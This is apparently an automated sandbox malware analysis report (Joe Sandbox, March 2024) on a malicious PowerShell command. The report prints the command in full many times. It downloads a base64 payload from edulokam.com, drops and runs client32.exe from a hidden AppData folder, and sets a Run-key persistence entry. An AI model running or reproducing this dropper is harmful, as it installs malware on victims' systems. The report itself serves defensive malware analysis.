"http://C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe%22%20-Ex%20Bypass%20-NoP%20-C%20$PTBtYpeCFHynkdkoevUtEl='https://edulokam.com/data.php?14831';$gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl=(New-Object%20System.Net.WebClient).DownloadString($PTBtYpeCFHynkdkoevUtEl);$arxPMyynqrYXFJuXGWYmMP=%5BSystem.Convert%5D::FromBase64String($gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl);$zxc%20=%20Get-Random%20-Minimum%20-10%20-Maximum%2037;%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy=%5BSystem.Environment%5D::GetFolderPath('ApplicationData')+'%5CDIVX'+$zxc;if%20(!(Test-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-PathType%20Container))%20%7B%20New-Item%20-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-ItemType%20Directory%20%7D;$p=Join-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20'WWW.zip';%5BSystem.IO.File%5D::WriteAllBytes($p,$arxPMyynqrYXFJuXGWYmMP);try%20%7B%20Add-Type%20-A%20System.IO.Compression.FileSystem;%5BSystem.IO.Compression.ZipFile%5D::ExtractToDirectory($p,$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy)%7D%20catch%20%7B%20Write-Host%20'Failed:%20'%20+%20$_;%20exit%7D;$CV=Join-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20'client32.exe';if%20(Test-Path%20$CV%20-PathType%20Leaf)%20%7B%20Start-Process%20-FilePath%20$CV%7D%20else%20%7B%20Write-Host%20'No%20exe.'%7D;$AZ=Get-Item%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-Force;%20$AZ.attributes='Hidden';$s=$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy+'%5Cclient32.exe';$k='HKCU:%5CSOFTWARE%5CMicrosoft%5CWindows%5CCurrentVersion%5CRun';$v='OFFICEC';$DS='String';New-ItemProperty%20-Path%20$k%20-Name%20$v%20-Value%20$s%20-PropertyType%20$DS;"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe%22%20-Ex%20Bypass%20-NoP%20-C%20$PTBtYpeCFHynkdkoevUtEl='https://edulokam.com/data.php?14831';$gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl=(New-Object%20System.Net.WebClient).DownloadString($PTBtYpeCFHynkdkoevUtEl);$arxPMyynqrYXFJuXGWYmMP=%5BSystem.Convert%5D::FromBase64String($gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl);$zxc%20=%20Get-Random%20-Minimum%20-10%20-Maximum%2037;%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy=%5BSystem.Environment%5D::GetFolderPath('ApplicationData')+'%5CDIVX'+$zxc;if%20(!(Test-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-PathType%20Container))%20%7B%20New-Item%20-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-ItemType%20Directory%20%7D;$p=Join-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20'WWW.zip';%5BSystem.IO.File%5D::WriteAllBytes($p,$arxPMyynqrYXFJuXGWYmMP);try%20%7B%20Add-Type%20-A%20System.IO.Compression.FileSystem;%5BSystem.IO.Compression.ZipFile%5D::ExtractToDirectory($p,$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy)%7D%20catch%20%7B%20Write-Host%20'Failed:%20'%20+%20$_;%20exit%7D;$CV=Join-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20'client32.exe';if%20(Test-Path%20$CV%20-PathType%20Leaf)%20%7B%20Start-Process%20-FilePath%20$CV%7D%20else%20%7B%20Write-Host%20'No%20exe.'%7D;$AZ=Get-Item%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-Force;%20$AZ.attributes='Hidden';$s=$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy+'%5Cclient32.exe';$k='HKCU:%5CSOFTWARE%5CMicrosoft%5CWindows%5CCurrentVersion%5CRun';$v='OFFICEC';$DS='String';New-ItemProperty%20-Path%20$k%20-Name%20$v%20-Value%20$s%20-PropertyType%20$DS;" Jump to behavior

Data Obfuscation

barindex
Source: unknownProcess created: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe%22%20-Ex%20Bypass%20-NoP%20-C%20$PTBtYpeCFHynkdkoevUtEl='https://edulokam.com/data.php?14831';$gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl=(New-Object%20System.Net.WebClient).DownloadString($PTBtYpeCFHynkdkoevUtEl);$arxPMyynqrYXFJuXGWYmMP=%5BSystem.Convert%5D::FromBase64String($gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl);$zxc%20=%20Get-Random%20-Minimum%20-10%20-Maximum%2037;%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy=%5BSystem.Environment%5D::GetFolderPath('ApplicationData')+'%5CDIVX'+$zxc;if%20(!(Test-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-PathType%20Container))%20%7B%20New-Item%20-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-ItemType%20Directory%20%7D;$p=Join-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20'WWW.zip';%5BSystem.IO.File%5D::WriteAllBytes($p,$arxPMyynqrYXFJuXGWYmMP);try%20%7B%20Add-Type%20-A%20System.IO.Compression.FileSystem;%5BSystem.IO.Compression.ZipFile%5D::ExtractToDirectory($p,$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy)%7D%20catch%20%7B%20Write-Host%20'Failed:%20'%20+%20$_;%20exit%7D;$CV=Join-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20'client32.exe';if%20(Test-Path%20$CV%20-PathType%20Leaf)%20%7B%20Start-Process%20-FilePath%20$CV%7D%20else%20%7B%20Write-Host%20'No%20exe.'%7D;$AZ=Get-Item%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-Force;%20$AZ.attributes='Hidden';$s=$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy+'%5Cclient32.exe';$k='HKCU:%5CSOFTWARE%5CMicrosoft%5CWindows%5CCurrentVersion%5CRun';$v='OFFICEC';$DS='String';New-ItemProperty%20-Path%20$k%20-Name%20$v%20-Value%20$s%20-PropertyType%20$DS;" > cmdline.out 2>&1
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: wget.exe, 00000002.00000002.2061132415.0000000000A2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c wget -t 2 -v -t 60 -p "c:\users\user\desktop\download" --no-check-certificate --content-disposition --user-agent="mozilla/5.0 (windows nt 6.1; wow64; trident/7.0; as; rv:11.0) like gecko" "http://c:/windows/system32/windowspowershell/v1.0/powershell.exe%22%20-ex%20bypass%20-nop%20-c%20$ptbtypecfhynkdkoevutel='https://edulokam.com/data.php?14831';$gopmqumpejzopqvnepyixtoqjcwdazgqql=(new-object%20system.net.webclient).downloadstring($ptbtypecfhynkdkoevutel);$arxpmyynqryxfjuxgwymmp=%5bsystem.convert%5d::frombase64string($gopmqumpejzopqvnepyixtoqjcwdazgqql);$zxc%20=%20get-random%20-minimum%20-10%20-maximum%2037;%20$jszjrbplfpturaeevyssvqzoqsuyxzkry=%5bsystem.environment%5d::getfolderpath('applicationdata')+'%5cdivx'+$zxc;if%20(!(test-path%20$jszjrbplfpturaeevyssvqzoqsuyxzkry%20-pathtype%20container))%20%7b%20new-item%20-path%20$jszjrbplfpturaeevyssvqzoqsuyxzkry%20-itemtype%20directory%20%7d;$p=join-path%20$jszjrbplfpturaeevyssvqzoqsuyxzkry%20'www.zip';%5bsystem.io.file%5d::writeallbytes($p,$arxpmyynqryxfjuxgwymmp);try%20%7b%20add-type%20-a%20system.io.compression.filesystem;%5bsystem.io.compression.zipfile%5d::extracttodirectory($p,$jszjrbplfpturaeevyssvqzoqsuyxzkry)%7d%20catch%20%7b%20write-host%20'failed:%20'%20+%20$_;%20exit%7d;$cv=join-path%20$jszjrbplfpturaeevyssvqzoqsuyxzkry%20'client32.exe';if%20(test-path%20$cv%20-pathtype%20leaf)%20%7b%20start-process%20-filepath%20$cv%7d%20else%20%7b%20write-host%20'no%20exe.'%7d;$az=get-item%20$jszjrbplfpturaeevyssvqzoqsuyxzkry%20-force;%20$az.attributes='hidden';$s=$jszjrbplfpturaeevyssvqzoqsuyxzkry+'%5cclient32.exe';$k='hkcu:%5csoftware%5cmicrosoft%5cwindows%5ccurrentversion%5crun';$v='officec';$ds='string';new-itemproperty%20-path%20$k%20-name%20$v%20-value%20$s%20-propertytype%20$ds;" > cmdline.out 2>&1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -t 60 -p "c:\users\user\desktop\download" --no-check-certificate --content-disposition --user-agent="mozilla/5.0 (windows nt 6.1; wow64; trident/7.0; as; rv:11.0) like gecko" "http://c:/windows/system32/windowspowershell/v1.0/powershell.exe%22%20-ex%20bypass%20-nop%20-c%20$ptbtypecfhynkdkoevutel='https://edulokam.com/data.php?14831';$gopmqumpejzopqvnepyixtoqjcwdazgqql=(new-object%20system.net.webclient).downloadstring($ptbtypecfhynkdkoevutel);$arxpmyynqryxfjuxgwymmp=%5bsystem.convert%5d::frombase64string($gopmqumpejzopqvnepyixtoqjcwdazgqql);$zxc%20=%20get-random%20-minimum%20-10%20-maximum%2037;%20$jszjrbplfpturaeevyssvqzoqsuyxzkry=%5bsystem.environment%5d::getfolderpath('applicationdata')+'%5cdivx'+$zxc;if%20(!(test-path%20$jszjrbplfpturaeevyssvqzoqsuyxzkry%20-pathtype%20container))%20%7b%20new-item%20-path%20$jszjrbplfpturaeevyssvqzoqsuyxzkry%20-itemtype%20directory%20%7d;$p=join-path%20$jszjrbplfpturaeevyssvqzoqsuyxzkry%20'www.zip';%5bsystem.io.file%5d::writeallbytes($p,$arxpmyynqryxfjuxgwymmp);try%20%7b%20add-type%20-a%20system.io.compression.filesystem;%5bsystem.io.compression.zipfile%5d::extracttodirectory($p,$jszjrbplfpturaeevyssvqzoqsuyxzkry)%7d%20catch%20%7b%20write-host%20'failed:%20'%20+%20$_;%20exit%7d;$cv=join-path%20$jszjrbplfpturaeevyssvqzoqsuyxzkry%20'client32.exe';if%20(test-path%20$cv%20-pathtype%20leaf)%20%7b%20start-process%20-filepath%20$cv%7d%20else%20%7b%20write-host%20'no%20exe.'%7d;$az=get-item%20$jszjrbplfpturaeevyssvqzoqsuyxzkry%20-force;%20$az.attributes='hidden';$s=$jszjrbplfpturaeevyssvqzoqsuyxzkry+'%5cclient32.exe';$k='hkcu:%5csoftware%5cmicrosoft%5cwindows%5ccurrentversion%5crun';$v='officec';$ds='string';new-itemproperty%20-path%20$k%20-name%20$v%20-value%20$s%20-propertytype%20$ds;"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -t 60 -p "c:\users\user\desktop\download" --no-check-certificate --content-disposition --user-agent="mozilla/5.0 (windows nt 6.1; wow64; trident/7.0; as; rv:11.0) like gecko" "http://c:/windows/system32/windowspowershell/v1.0/powershell.exe%22%20-ex%20bypass%20-nop%20-c%20$ptbtypecfhynkdkoevutel='https://edulokam.com/data.php?14831';$gopmqumpejzopqvnepyixtoqjcwdazgqql=(new-object%20system.net.webclient).downloadstring($ptbtypecfhynkdkoevutel);$arxpmyynqryxfjuxgwymmp=%5bsystem.convert%5d::frombase64string($gopmqumpejzopqvnepyixtoqjcwdazgqql);$zxc%20=%20get-random%20-minimum%20-10%20-maximum%2037;%20$jszjrbplfpturaeevyssvqzoqsuyxzkry=%5bsystem.environment%5d::getfolderpath('applicationdata')+'%5cdivx'+$zxc;if%20(!(test-path%20$jszjrbplfpturaeevyssvqzoqsuyxzkry%20-pathtype%20container))%20%7b%20new-item%20-path%20$jszjrbplfpturaeevyssvqzoqsuyxzkry%20-itemtype%20directory%20%7d;$p=join-path%20$jszjrbplfpturaeevyssvqzoqsuyxzkry%20'www.zip';%5bsystem.io.file%5d::writeallbytes($p,$arxpmyynqryxfjuxgwymmp);try%20%7b%20add-type%20-a%20system.io.compression.filesystem;%5bsystem.io.compression.zipfile%5d::extracttodirectory($p,$jszjrbplfpturaeevyssvqzoqsuyxzkry)%7d%20catch%20%7b%20write-host%20'failed:%20'%20+%20$_;%20exit%7d;$cv=join-path%20$jszjrbplfpturaeevyssvqzoqsuyxzkry%20'client32.exe';if%20(test-path%20$cv%20-pathtype%20leaf)%20%7b%20start-process%20-filepath%20$cv%7d%20else%20%7b%20write-host%20'no%20exe.'%7d;$az=get-item%20$jszjrbplfpturaeevyssvqzoqsuyxzkry%20-force;%20$az.attributes='hidden';$s=$jszjrbplfpturaeevyssvqzoqsuyxzkry+'%5cclient32.exe';$k='hkcu:%5csoftware%5cmicrosoft%5cwindows%5ccurrentversion%5crun';$v='officec';$ds='string';new-itemproperty%20-path%20$k%20-name%20$v%20-value%20$s%20-propertytype%20$ds;" Jump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
Command and Scripting Interpreter		1
DLL Side-Loading		1
Process Injection		1
Masquerading		OS Credential Dumping1
Security Software Discovery		Remote ServicesData from Local SystemData ObfuscationExfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory1
System Information Discovery		Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
DLL Side-Loading		Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1415280 URL: http://C:/Windows/System32/... Startdate: 25/03/2024 Architecture: WINDOWS Score: 68 12 Multi AV Scanner detection for domain / URL 2->12 14 Antivirus detection for URL or domain 2->14 16 Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet 2->16 18 2 other signatures 2->18 6 cmd.exe 2 2->6         started        process3 process4 8 conhost.exe 6->8         started        10 wget.exe 1 6->10         started       

Screenshots

Download Video

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
http://C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe%22%20-Ex%20Bypass%20-NoP%20-C%20$PTBtYpeCFHynkdkoevUtEl='https://edulokam.com/data.php?14831';$gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl=(New-Object%20System.Net.WebClient).DownloadString($PTBtYpeCFHynkdkoevUtEl);$arxPMyynqrYXFJuXGWYmMP=%5BSystem.Convert%5D::FromBase64String($gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl);$zxc%20=%20Get-Random%20-Minimum%20-10%20-Maximum%2037;%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy=%5BSystem.Environment%5D::GetFolderPath('ApplicationData')+'%5CDIVX'+$zxc;if%20(!(Test-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-PathType%20Container))%20%7B%20New-Item%20-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-ItemType%20Directory%20%7D;$p=Join-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20'WWW.zip';%5BSystem.IO.File%5D::WriteAllBytes($p,$arxPMyynqrYXFJuXGWYmMP);try%20%7B%20Add-Type%20-A%20System.IO.Compression.FileSystem;%5BSystem.IO.Compression.ZipFile%5D::ExtractToDirectory($p,$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy)%7D%20catch%20%7B%20Write-Host%20'Failed:%20'%20+%20$_;%20exit%7D;$CV=Join-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20'client32.exe';if%20(Test-Path%20$CV%20-PathType%20Leaf)%20%7B%20Start-Process%20-FilePath%20$CV%7D%20else%20%7B%20Write-Host%20'No%20exe.'%7D;$AZ=Get-Item%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-Force;%20$AZ.attributes='Hidden';$s=$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy+'%5Cclient32.exe';$k='HKCU:%5CSOFTWARE%5CMicrosoft%5CWindows%5CCurrentVersion%5CRun';$v='OFFICEC';$DS='String';New-ItemProperty%20-Path%20$k%20-Name%20$v%20-Value%20$s%20-PropertyType%20$DS;0%Avira URL Cloudsafe

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://edulokam.comdulokam.comon%0%Avira URL Cloudsafe
http://C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe%22%20-Ex%20Bypass%20-NoP%20-C%20$PT0%Avira URL Cloudsafe
https://edulokam.com100%Avira URL Cloudmalware
http://c/Windows/System32/WindowsPowerShell/v1.0/powershell.exe%22%20-Ex%20Bypass%20-NoP%20-C%20$PTB0%Avira URL Cloudsafe
https://edulokam.com/data.php?14831100%Avira URL Cloudmalware
https://edulokam.comdulokam.com0%Avira URL Cloudsafe
https://edulokam.com/data.php100%Avira URL Cloudmalware
https://edulokam.com/data.php16%VirustotalBrowse
https://edulokam.com16%VirustotalBrowse

Domains and IPs

Contacted Domains

No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
https://edulokam.comdulokam.comon%wget.exe, 00000002.00000002.2061165851.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
low
https://edulokam.comwget.exe, 00000002.00000002.2061165851.0000000000B36000.00000004.00000020.00020000.00000000.sdmptrue
  • 16%, Virustotal, Browse
  • Avira URL Cloud: malware
unknown
https://edulokam.com/data.php?14831wget.exe, 00000002.00000002.2061165851.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, cmdline.out.0.drtrue
  • Avira URL Cloud: malware
unknown
http://C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe%22%20-Ex%20Bypass%20-NoP%20-C%20$PTwget.exe, 00000002.00000002.2061165851.0000000000B30000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: safe
low
http://c/Windows/System32/WindowsPowerShell/v1.0/powershell.exe%22%20-Ex%20Bypass%20-NoP%20-C%20$PTBwget.exe, 00000002.00000002.2061165851.0000000000B36000.00000004.00000020.00020000.00000000.sdmp, cmdline.out.0.drfalse
  • Avira URL Cloud: safe
low
https://edulokam.comdulokam.comwget.exe, 00000002.00000002.2061165851.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://edulokam.com/data.phpwget.exe, 00000002.00000002.2061165851.0000000000B36000.00000004.00000020.00020000.00000000.sdmptrue
  • 16%, Virustotal, Browse
  • Avira URL Cloud: malware
unknown

World Map of Contacted IPs

No contacted IP infos

General Information

Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1415280
Start date and time:2024-03-25 17:27:25 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 1m 39s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:urldownload.jbs
Sample URL:http://C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe" -Ex Bypass -NoP -C $PTBtYpeCFHynkdkoevUtEl='https://edulokam.com/data.php?14831';$gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl=(New-Object System.Net.WebClient).DownloadString($PTBtYpeCFHynkdkoevUtEl);$arxPMyynqrYXFJuXGWYmMP=[System.Convert]::FromBase64String($gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl);$zxc = Get-Random -Minimum -10 -Maximum 37; $jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy=[System.Environment]::GetFolderPath('ApplicationData')+'\DIVX'+$zxc;if (!(Test-Path $jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy -PathType Container)) { New-Item -Path $jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy -ItemType Directory };$p=Join-Path $jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy 'WWW.zip';[System.IO.File]::WriteAllBytes($p,$arxPMyynqrYXFJuXGWYmMP);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else { Write-Host 'No exe.'};$AZ=Get-Item $jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy -Force; $AZ.attributes='Hidden';$s=$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='OFFICEC';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:4
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal68.win@4/1@0/0
EGA Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Unable to download file
  • Exclude process from analysis (whitelisted): dllhost.exe
  • Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASNs

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\Desktop\cmdline.out

Download File
Process:C:\Windows\SysWOW64\cmd.exe
File Type:ASCII text, with very long lines (1592), with CRLF line terminators
Category:modified
Size (bytes):1689
Entropy (8bit):5.74491121875672
Encrypted:false
SSDEEP:48:tN3BPzsO4IfPLI3KmnknspnJey1aJ3RnGQhhYnxbLg2MHnR:dPD4WPLI3KmnknspnJeyYJ3RndhYnxbU
MD5:8643BA801ADA1CB0C832B520CC3BC245
SHA1:97784C9A5311CF4C4E8520C854A315A88AE48374
SHA-256:C33E0D9B0936954CEE74B33778714CB34D79248180E45FC060A72CC49EEC8FE7
SHA-512:C9CB72882A2826E508FB8BA1DEE3F2EF30130E2A0FEC2CA4C27B10CB9AF35294E2CE46F8D9643832CAF748C93C89C3C7760DC46D69CDF76CB6B7679BB27D3245
Malicious:false
Reputation:low
Preview:--2024-03-25 17:28:14-- http://c/Windows/System32/WindowsPowerShell/v1.0/powershell.exe%22%20-Ex%20Bypass%20-NoP%20-C%20$PTBtYpeCFHynkdkoevUtEl='https://edulokam.com/data.php?14831';$gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl=(New-Object%20System.Net.WebClient).DownloadString($PTBtYpeCFHynkdkoevUtEl);$arxPMyynqrYXFJuXGWYmMP=%5BSystem.Convert%5D::FromBase64String($gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl);$zxc%20=%20Get-Random%20-Minimum%20-10%20-Maximum%2037;%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy=%5BSystem.Environment%5D::GetFolderPath('ApplicationData')+'%5CDIVX'+$zxc;if%20(!(Test-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-PathType%20Container))%20%7B%20New-Item%20-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-ItemType%20Directory%20%7D;$p=Join-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20'WWW.zip';%5BSystem.IO.File%5D::WriteAllBytes($p,$arxPMyynqrYXFJuXGWYmMP);try%20%7B%20Add-Type%20-A%20System.IO.Compression.FileSystem;%5BSystem.IO.Compression.ZipFile%5D::ExtractToDirectory($p,$jSzJrBPlfPTuRAeEvy

Static File Info

No static file info

Network Behavior

No network behavior found

Statistics

CPU Usage

012345s020406080100

Click to jump to process

Memory Usage

012345s0.0051015MB

Click to jump to process

Behavior

Click to jump to process

System Behavior

General

Target ID:0
Start time:17:28:14
Start date:25/03/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe%22%20-Ex%20Bypass%20-NoP%20-C%20$PTBtYpeCFHynkdkoevUtEl='https://edulokam.com/data.php?14831';$gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl=(New-Object%20System.Net.WebClient).DownloadString($PTBtYpeCFHynkdkoevUtEl);$arxPMyynqrYXFJuXGWYmMP=%5BSystem.Convert%5D::FromBase64String($gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl);$zxc%20=%20Get-Random%20-Minimum%20-10%20-Maximum%2037;%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy=%5BSystem.Environment%5D::GetFolderPath('ApplicationData')+'%5CDIVX'+$zxc;if%20(!(Test-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-PathType%20Container))%20%7B%20New-Item%20-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-ItemType%20Directory%20%7D;$p=Join-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20'WWW.zip';%5BSystem.IO.File%5D::WriteAllBytes($p,$arxPMyynqrYXFJuXGWYmMP);try%20%7B%20Add-Type%20-A%20System.IO.Compression.FileSystem;%5BSystem.IO.Compression.ZipFile%5D::ExtractToDirectory($p,$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy)%7D%20catch%20%7B%20Write-Host%20'Failed:%20'%20+%20$_;%20exit%7D;$CV=Join-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20'client32.exe';if%20(Test-Path%20$CV%20-PathType%20Leaf)%20%7B%20Start-Process%20-FilePath%20$CV%7D%20else%20%7B%20Write-Host%20'No%20exe.'%7D;$AZ=Get-Item%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-Force;%20$AZ.attributes='Hidden';$s=$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy+'%5Cclient32.exe';$k='HKCU:%5CSOFTWARE%5CMicrosoft%5CWindows%5CCurrentVersion%5CRun';$v='OFFICEC';$DS='String';New-ItemProperty%20-Path%20$k%20-Name%20$v%20-Value%20$s%20-PropertyType%20$DS;" > cmdline.out 2>&1
Imagebase:0x790000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true
Show Windows behavior

File Activities

Show Windows behavior

Section Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
Show Windows behavior

Process Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
Show Windows behavior

Memory Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

General

Target ID:1
Start time:17:28:14
Start date:25/03/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true
Show Windows behavior

File Activities

Show Windows behavior

Section Activities

There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
